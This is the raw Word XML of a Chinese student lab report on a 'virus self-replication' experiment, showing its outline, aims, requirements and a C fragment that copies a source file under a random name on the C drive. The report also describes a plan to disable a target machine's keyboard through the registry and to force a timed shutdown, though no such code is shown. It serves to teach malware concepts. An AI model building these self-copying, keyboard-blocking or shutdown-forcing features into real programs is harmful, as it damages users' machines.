        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc42471957 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="441CDF7C" w14:textId="6AD46DF8" w:rsidR="00E171BC" w:rsidRDefault="00A80A91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471958" w:history="1">
        <w:r w:rsidR="00E171BC" w:rsidRPr="00F62399">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>6.</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC" w:rsidRPr="00F62399">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>实验过程记录</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc42471958 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22B676E9" w14:textId="498ACB8B" w:rsidR="00E171BC" w:rsidRDefault="00A80A91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471959" w:history="1">
        <w:r w:rsidR="00E171BC" w:rsidRPr="00F62399">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>7.</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC" w:rsidRPr="00F62399">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>实验心得</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc42471959 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CFC7A79" w14:textId="31F5690A" w:rsidR="00E171BC" w:rsidRDefault="00A80A91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471960" w:history="1">
        <w:r w:rsidR="00E171BC" w:rsidRPr="00F62399">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>8.</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC" w:rsidRPr="00F62399">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>参考资料</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc42471960 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CF345C8" w14:textId="29370042" w:rsidR="00E171BC" w:rsidRDefault="00A80A91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471961" w:history="1">
        <w:r w:rsidR="00E171BC" w:rsidRPr="00F62399">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>9.</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC" w:rsidRPr="00F62399">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
          </w:rPr>
          <w:t>完整代码</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc42471961 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00E171BC">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="66F01790" w14:textId="6BC8CA9E" w:rsidR="00E75699" w:rsidRDefault="004A1203" w:rsidP="00B54892">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54892">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="533FA27B" w14:textId="29EC5E9D" w:rsidR="00B442F4" w:rsidRDefault="00E75699" w:rsidP="00556F40">
      <w:pPr>
        <w:widowControl/>
        <w:topLinePunct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F66D9F" w14:textId="11EBEEDC" w:rsidR="00556F40" w:rsidRPr="00556F40" w:rsidRDefault="00556F40" w:rsidP="00556F40">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc42471952"/>
      <w:r w:rsidRPr="00556F40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>实验</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00556F40">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00556F40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>病毒的自我复制实验</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="5811D400" w14:textId="1A4D95AE" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6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3" w:name="_Toc42471953"/>
      <w:r w:rsidRPr="000F05E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="20DF786C" w14:textId="77777777" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>理解病毒自我复制的原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3072C5E4" w14:textId="77777777" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>掌握病毒复制的文件操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60939F27" w14:textId="5A51A711" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>在不限制复制次数的情况下观察它的破坏效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098323E6" w14:textId="09DA1C1D" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6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4" w:name="_Toc42471954"/>
      <w:r w:rsidRPr="000F05E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验要求</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="51C0508E" w14:textId="77777777" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C </w:t>
      </w:r>
      <w:r>
        <w:t>语言为开发工具，设计并开发一个简单的病毒文件自我复制的程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B38646B" w14:textId="77777777" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>可以增加循环语句，对病毒程序完成多个目录下的多个拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5DC0E1" w14:textId="77777777" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>该复制程序能够扩展，允许开发或操作者对复制的次数、频率进行设定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5646A" w14:textId="44E5ADB3" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>独自开发、独立运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A458797" w14:textId="56D20C38" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6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5" w:name="_Toc42471955"/>
      <w:r w:rsidRPr="000F05E6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="78BF1D40" w14:textId="2D27997E" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6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操作系统：</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft windowsXP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63384B84" w14:textId="50C17C1C" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6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开发工具：</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C31B76" w14:textId="087DFE9B" w:rsidR="000F05E6" w:rsidRPr="00E171BC" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="1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bookmarkStart w:id="6" w:name="_Toc42471956"/>
      <w:r w:rsidRPr="00E171BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7D806B93" w14:textId="77777777" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>学习病毒的自我复制原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14349137" w14:textId="77777777" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>理解计算机病毒自我复制与生物病毒自我复制的不同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57599F4E" w14:textId="77777777" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C </w:t>
      </w:r>
      <w:r>
        <w:t>程序开发一款能自我复制的程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BC2901" w14:textId="1805283B" w:rsidR="000F05E6" w:rsidRDefault="000F05E6" w:rsidP="000F05E6">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>对运行的结果验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E52412" w14:textId="0C4B34E0" w:rsidR="00A760B0" w:rsidRPr="00E171BC" w:rsidRDefault="00A760B0" w:rsidP="00A760B0">
      <w:pPr>
        <w:pStyle w:val="1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bookmarkStart w:id="7" w:name="_Toc42471957"/>
      <w:r w:rsidRPr="00E171BC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注意事项</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="25F35A9B" w14:textId="77777777" w:rsidR="00A760B0" w:rsidRDefault="00A760B0" w:rsidP="00A760B0">
      <w:r>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r>
        <w:t>对循环语句要做一定的限制，不要无限的循环，避免造成程序的宕机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E5506D" w14:textId="7BD152D7" w:rsidR="00A760B0" w:rsidRDefault="00A760B0" w:rsidP="00A760B0">
      <w:r>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r>
        <w:t>对复制的目标尽量可以选定，做好后续与其他程序的进一步对接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28640F32" w14:textId="3B6252CA" w:rsidR="00A760B0" w:rsidRDefault="00A760B0" w:rsidP="00A760B0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc42471958"/>
      <w:r w:rsidRPr="00A760B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A760B0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>实验过程记录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="460EE660" w14:textId="14B51094" w:rsidR="00556F40" w:rsidRDefault="00556F40" w:rsidP="00A304F4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次实验计划完成一个自我复制病毒，另外附加两个额外的功能：修改注册表使得目标机键盘被屏蔽，强制目标机在规定时间内关机，</w:t>
      </w:r>
      <w:r w:rsidR="00254415">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>达到重启后注册表得到修改的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FCD0B0" w14:textId="3D16531A" w:rsidR="00C94B44" w:rsidRDefault="00C94B44" w:rsidP="00A304F4">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>病毒复制类似于文件复制，通过打开文件将文件的数据读取出来，再写到一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>个空文件中并重新设置新文件的格式，即可完成病毒复制。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>实现病毒复制的主要思路是：开辟一个缓冲区，不断从原文件中读取内容到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>缓冲区，每读取完一次就将缓冲区中的内容写入到新建的文件，直到把原文件的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>内容读取完。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VC++</w:t>
      </w:r>
      <w:r>
        <w:t>中创建</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Win32 Console Application </w:t>
      </w:r>
      <w:r>
        <w:t>文件命名为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Copy</w:t>
      </w:r>
      <w:r>
        <w:t>，并选择一个</w:t>
      </w:r>
      <w:r>
        <w:t>” Hello World”</w:t>
      </w:r>
      <w:r>
        <w:t>的控制台文件。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>由于复制文件的过程需要使用到两个文件指针</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fp1 </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> fp2</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fp1 </w:t>
      </w:r>
      <w:r>
        <w:t>用于打开被复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>制的文件，</w:t>
      </w:r>
      <w:r>
        <w:t>fp2</w:t>
      </w:r>
      <w:r>
        <w:t>用于打开新文件，因此创建两个文件指针</w:t>
      </w:r>
      <w:r>
        <w:t>fp1</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fp2</w:t>
      </w:r>
      <w:r>
        <w:t>并指向</w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>为了使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FILE *</w:t>
      </w:r>
      <w:r>
        <w:t>定义，加载头文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7EF01A" w14:textId="23307C36" w:rsidR="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00C94B44">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，给出自我复制部分的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8BA2EF" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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pyfile(){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F67839" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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304F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random name module*/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6F14E5" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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304F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_str[100] =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818E80" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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304F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;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F44A142" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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rand((unsigned)time(NULL));  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EB5C3D" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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ame = rand() % 1024;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3E3BFF" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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_itoa(name, name_str, 16);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04906315" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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304F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self-replicated module*/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35CE02" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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304F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in = NULL, * out = NULL;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552CF11A" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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304F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le[50] =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:\\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2A4C23" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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cat(file, name_str);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B79E73" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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cat(file,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cpp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468369" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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 = fopen(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pf.cpp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+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2C209F" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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 = fopen(file,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7EC468E" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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304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feof(in)){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5BAAC6" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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putc(fgetc(in), out);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB34B10" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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539C8C" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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close(in);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA98ABE" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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close(out);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C535F" w14:textId="77777777" w:rsidR="00A304F4" w:rsidRPr="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304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686BBA8" w14:textId="48951553" w:rsidR="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304F4">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码分为两个模块：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>andom name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elf-replicated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348710B3" w14:textId="4003ED71" w:rsidR="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304F4">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:t>random name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顾名思义是为文件取了随机的名字，这个模块我是参考网络上的代码进行的，它的原理是根据时间来生成随机数。其实与示例里面的区别不大。需要注意的是调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>ime.h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B8EA94" w14:textId="617F6807" w:rsidR="00A304F4" w:rsidRDefault="00A304F4" w:rsidP="00A304F4">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>elf-replicated</w:t>
